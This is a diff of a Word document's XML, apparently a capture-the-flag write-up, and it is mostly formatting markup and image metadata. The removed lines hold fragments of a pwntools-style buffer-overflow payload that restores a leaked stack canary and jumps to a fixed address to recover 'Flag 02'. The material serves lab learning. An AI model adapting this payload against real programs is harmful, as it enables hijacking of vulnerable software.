-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>cyclic</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>24</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> p64(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>cyclic</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> p64(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>0x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>40121B</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>shutdown</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>recieved</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>recvall</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>().</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>decode</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>recieved</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>splitlines</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>()[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>print</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'Flag 02: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>{</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5685BD68" wp14:editId="36AEA77B">
-            <wp:extent cx="5972810" cy="1275715"/>
-            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
-            <wp:docPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="1185386941" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5622,7 +4383,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5972810" cy="1275715"/>
+                      <a:ext cx="4305521" cy="1168460"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5664,6 +4425,121 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
